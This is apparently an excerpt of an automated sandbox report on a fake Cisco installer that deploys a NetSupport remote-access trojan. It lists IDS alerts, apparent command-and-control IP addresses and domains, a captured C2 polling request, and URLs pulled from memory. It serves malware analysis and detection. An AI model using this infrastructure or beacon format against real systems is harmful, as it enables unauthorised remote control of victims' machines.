                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 9_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,9_2_110BC3D0

                                  Networking

                                  barindex
                                  Suricata IDS alerts for network traffic
                                  Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.6:60703 -> 151.236.16.15:443
                                  Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.6:60707 -> 199.188.200.195:443
                                  Yara detected NetSupport Downloader
                                  Source: Yara matchFile source: amsi32_3412.amsi.csv, type: OTHER
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\Cisco\unins000.dat, type: DROPPED
                                  NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
                                  Source: is-O18K3.tmp.2.drStatic PE information: Found NDIS imports: FwpsCalloutRegister1, FwpsCalloutRegister0, FwpmFilterDeleteById0, FwpmBfeStateSubscribeChanges0, FwpsCalloutUnregisterById0, FwpmFilterAdd0, FwpsStreamInjectAsync0, FwpsQueryPacketInjectionState0, FwpsInjectTransportReceiveAsync0, FwpsInjectTransportSendAsync0, FwpsConstructIpHeaderForTransportPacket0, FwpsFreeCloneNetBufferList0, FwpsAllocateCloneNetBufferList0, FwpsFreeNetBufferList0, FwpsAllocateNetBufferAndNetBufferList0, FwpsInjectionHandleDestroy0, FwpsInjectionHandleCreate0, FwpsApplyModifiedLayerData0, FwpsAcquireWritableLayerDataPointer0, FwpsReleaseClassifyHandle0, FwpsAcquireClassifyHandle0, FwpmBfeStateUnsubscribeChanges0, FwpmuserOpen0, FwpmuserClose0, FwpmTransactionBegin0, FwpmTransactionCommit0, FwpmTransactionAbort0, FwpmProviderAdd0, FwpmProviderDeleteByKey0, FwpmSubLayerAdd0, FwpmSubLayerDeleteByKey0, FwpmCalloutAdd0, FwpmCalloutDeleteById0
                                  Source: is-0CFDM.tmp.2.drStatic PE information: Found NDIS imports: FwpmuserClose0, FwpmFilterAdd0, FwpmTransactionAbort0, FwpmFilterDeleteById0, FwpmTransactionBegin0, FwpmGetAppIdFromFileName0, FwpmuserOpen0, FwpmSubLayerDeleteByKey0, FwpmSubLayerAdd0, FwpmTransactionCommit0, FwpmProviderAdd0, FwpmProviderDeleteByKey0
                                  Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                  Source: Joe Sandbox ViewIP Address: 104.26.1.231 104.26.1.231
                                  Source: Joe Sandbox ViewASN Name: HVC-ASUS HVC-ASUS
                                  Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.6:49748
                                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.6:60861
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficDNS traffic detected: DNS query: payiki.com
                                  Source: global trafficDNS traffic detected: DNS query: anyhowdo.com
                                  Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                  Source: unknownHTTP traffic detected: POST http://151.236.16.15/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 151.236.16.15Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                  Source: client32.exe, client32.exe, 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://%s/fakeurl.htm
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://%s/testpage.htm
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://%s/testpage.htmwininet.dll
                                  Source: client32.exe, client32.exe, 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://127.0.0.1
                                  Source: client32.exe, 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                  Source: is-KLEUG.tmp.2.dr, is-2J155.tmp.2.dr, is-I704D.tmp.2.dr, is-VTDA9.tmp.2.dr, is-V8S0O.tmp.2.dr, is-S9VDU.tmp.2.dr, is-2TJID.tmp.2.dr, is-SINFC.tmp.2.dr, is-H5812.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                  Source: is-KLEUG.tmp.2.dr, is-2J155.tmp.2.dr, is-I704D.tmp.2.dr, is-VTDA9.tmp.2.dr, is-V8S0O.tmp.2.dr, is-S9VDU.tmp.2.dr, is-2TJID.tmp.2.dr, is-SINFC.tmp.2.dr, is-H5812.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                  Source: is-KLEUG.tmp.2.dr, is-2J155.tmp.2.dr, is-I704D.tmp.2.dr, is-VTDA9.tmp.2.dr, is-V8S0O.tmp.2.dr, is-S9VDU.tmp.2.dr, is-2TJID.tmp.2.dr, is-SINFC.tmp.2.dr, is-H5812.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                                  Source: is-KLEUG.tmp.2.dr, is-2J155.tmp.2.dr, is-I704D.tmp.2.dr, is-VTDA9.tmp.2.dr, is-V8S0O.tmp.2.dr, is-S9VDU.tmp.2.dr, is-2TJID.tmp.2.dr, is-SINFC.tmp.2.dr, is-H5812.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                  Source: is-KLEUG.tmp.2.dr, is-2J155.tmp.2.dr, is-I704D.tmp.2.dr, is-VTDA9.tmp.2.dr, is-V8S0O.tmp.2.dr, is-S9VDU.tmp.2.dr, is-2TJID.tmp.2.dr, is-SINFC.tmp.2.dr, is-H5812.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                                  Source: CiscoSetup.exeString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                  Source: CiscoSetup.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                                  Source: CiscoSetup.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0(
                                  Source: CiscoSetup.exeString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                  Source: powershell.exe, 00000004.00000002.2458265497.000000000756A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                  Source: is-KLEUG.tmp.2.dr, is-2J155.tmp.2.dr, is-I704D.tmp.2.dr, is-VTDA9.tmp.2.dr, is-V8S0O.tmp.2.dr, is-S9VDU.tmp.2.dr, is-2TJID.tmp.2.dr, is-SINFC.tmp.2.dr, is-H5812.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                  Source: is-KLEUG.tmp.2.dr, is-2J155.tmp.2.dr, is-I704D.tmp.2.dr, is-VTDA9.tmp.2.dr, is-V8S0O.tmp.2.dr, is-S9VDU.tmp.2.dr, is-2TJID.tmp.2.dr, is-SINFC.tmp.2.dr, is-H5812.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                                  Source: is-KLEUG.tmp.2.dr, is-2J155.tmp.2.dr, is-I704D.tmp.2.dr, is-VTDA9.tmp.2.dr, is-V8S0O.tmp.2.dr, is-S9VDU.tmp.2.dr, is-2TJID.tmp.2.dr, is-SINFC.tmp.2.dr, is-H5812.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                  Source: is-KLEUG.tmp.2.dr, is-2J155.tmp.2.dr, is-I704D.tmp.2.dr, is-VTDA9.tmp.2.dr, is-V8S0O.tmp.2.dr, is-S9VDU.tmp.2.dr, is-2TJID.tmp.2.dr, is-SINFC.tmp.2.dr, is-H5812.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                  Source: is-KLEUG.tmp.2.dr, is-2J155.tmp.2.dr, is-I704D.tmp.2.dr, is-VTDA9.tmp.2.dr, is-V8S0O.tmp.2.dr, is-S9VDU.tmp.2.dr, is-2TJID.tmp.2.dr, is-SINFC.tmp.2.dr, is-H5812.tmp.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                                  Source: is-KLEUG.tmp.2.dr, is-2J155.tmp.2.dr, is-I704D.tmp.2.dr, is-VTDA9.tmp.2.dr, is-V8S0O.tmp.2.dr, is-S9VDU.tmp.2.dr, is-2TJID.tmp.2.dr, is-SINFC.tmp.2.dr, is-H5812.tmp.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                  Source: is-KLEUG.tmp.2.dr, is-2J155.tmp.2.dr, is-I704D.tmp.2.dr, is-VTDA9.tmp.2.dr, is-V8S0O.tmp.2.dr, is-S9VDU.tmp.2.dr, is-2TJID.tmp.2.dr, is-SINFC.tmp.2.dr, is-H5812.tmp.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                                  Source: client32.exe, client32.exe, 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                  Source: client32.exe, 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                  Source: client32.exe, 00000006.00000002.4598217115.0000000005101000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000003.2705520820.00000000050FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000003.2415445587.0000000005101000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspT
                                  Source: client32.exe, 00000006.00000003.2415445587.00000000050AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspn
                                  Source: powershell.exe, 00000004.00000002.2425908561.00000000064A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                                  Source: is-KLEUG.tmp.2.dr, is-2J155.tmp.2.dr, is-I704D.tmp.2.dr, is-VTDA9.tmp.2.dr, is-V8S0O.tmp.2.dr, is-S9VDU.tmp.2.dr, is-2TJID.tmp.2.dr, is-SINFC.tmp.2.dr, is-H5812.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0A
                                  Source: is-KLEUG.tmp.2.dr, is-2J155.tmp.2.dr, is-I704D.tmp.2.dr, is-VTDA9.tmp.2.dr, is-V8S0O.tmp.2.dr, is-S9VDU.tmp.2.dr, is-2TJID.tmp.2.dr, is-SINFC.tmp.2.dr, is-H5812.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0C
                                  Source: is-KLEUG.tmp.2.dr, is-2J155.tmp.2.dr, is-I704D.tmp.2.dr, is-VTDA9.tmp.2.dr, is-V8S0O.tmp.2.dr, is-S9VDU.tmp.2.dr, is-2TJID.tmp.2.dr, is-SINFC.tmp.2.dr, is-H5812.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0N
                                  Source: is-KLEUG.tmp.2.dr, is-2J155.tmp.2.dr, is-I704D.tmp.2.dr, is-VTDA9.tmp.2.dr, is-V8S0O.tmp.2.dr, is-S9VDU.tmp.2.dr, is-2TJID.tmp.2.dr, is-SINFC.tmp.2.dr, is-H5812.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0X
                                  Source: CiscoSetup.exeString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                  Source: CiscoSetup.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                                  Source: CiscoSetup.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.drString found in binary or memory: http://ocsp.thawte.com0
                                  Source: CiscoSetup.exeString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                  Source: is-2TJID.tmp.2.drString found in binary or memory: http://relaxng.org/ns/structure/1.0
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.drString found in binary or memory: http://s2.symcb.com0
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.00000000053B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.00000000053B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                  Source: CiscoSetup.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                                  Source: CiscoSetup.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                                  Source: CiscoSetup.exeString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crl0f
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crt0
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcd.com0&
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.drString found in binary or memory: http://sv.symcd.com0&
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                  Source: is-V7509.tmp.2.drString found in binary or memory: http://www.cisco.com/c/en/us/td/docs/security/vpn_client/anyconnect/anyconnect40/user/guide/b_Androi
                                  Source: is-KLEUG.tmp.2.dr, is-2J155.tmp.2.dr, is-I704D.tmp.2.dr, is-VTDA9.tmp.2.dr, is-V8S0O.tmp.2.dr, is-S9VDU.tmp.2.dr, is-2TJID.tmp.2.dr, is-SINFC.tmp.2.dr, is-H5812.tmp.2.drString found in binary or memory: http://www.cisco.com0
                                  Source: is-KLEUG.tmp.2.dr, is-2J155.tmp.2.dr, is-I704D.tmp.2.dr, is-VTDA9.tmp.2.dr, is-V8S0O.tmp.2.dr, is-S9VDU.tmp.2.dr, is-2TJID.tmp.2.dr, is-SINFC.tmp.2.dr, is-H5812.tmp.2.drString found in binary or memory: http://www.digicert.com/CPS0
                                  Source: powershell.exe, 00000004.00000002.2457352280.00000000074C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                                  Source: powershell.exe, 00000004.00000002.2463153795.00000000084F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                                  Source: client32.exe, 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000009.00000002.2497690917.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579319799.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                  Source: client32.exe, 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000009.00000002.2497690917.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579319799.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.drString found in binary or memory: http://www.netsupportsoftware.com
                                  Source: client32.exe, 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000009.00000002.2497690917.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579319799.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.pci.co.uk/support
                                  Source: client32.exe, 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000009.00000002.2497690917.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579319799.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.pci.co.uk/supportsupport
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.drString found in binary or memory: http://www.symauth.com/cps0(
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.drString found in binary or memory: http://www.symauth.com/rpa00
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                                  Source: powershell.exe, 00000004.00000002.2425908561.00000000064A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                  Source: powershell.exe, 00000004.00000002.2425908561.00000000064A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                  Source: powershell.exe, 00000004.00000002.2425908561.00000000064A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                  Source: is-2J155.tmp.2.drString found in binary or memory: https://curl.se/V
                                  Source: is-2J155.tmp.2.drString found in binary or memory: https://curl.se/docs/alt-svc.html
                                  Source: is-2J155.tmp.2.drString found in binary or memory: https://curl.se/docs/copyright.htmlD
                                  Source: is-2J155.tmp.2.drString found in binary or memory: https://curl.se/docs/hsts.html
                                  Source: is-2J155.tmp.2.drString found in binary or memory: https://curl.se/docs/http-cookies.html
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.drString found in binary or memory: https://d.symcb.com/cps0%
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.4.drString found in binary or memory: https://d.symcb.com/rpa0
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                  Source: CiscoSetup.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                                  Source: powershell.exe, 00000004.00000002.2425908561.00000000064A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                                  Source: powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                                  Source: CiscoSetup.exe, 00000000.00000003.2546263258.0000000003123000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000002.00000003.2535098758.0000000002CAC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.cisco.com
                                  Source: CiscoSetup.exe, 00000000.00000003.2546263258.0000000003131000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.cisco.com/support
                                  Source: CiscoSetup.tmp, 00000002.00000003.2535098758.0000000002CC1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.cisco.com/supportQy
                                  Source: CiscoSetup.exe, 00000000.00000003.2546263258.0000000003131000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000002.00000003.2535098758.0000000002CC1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.cisco.com/update
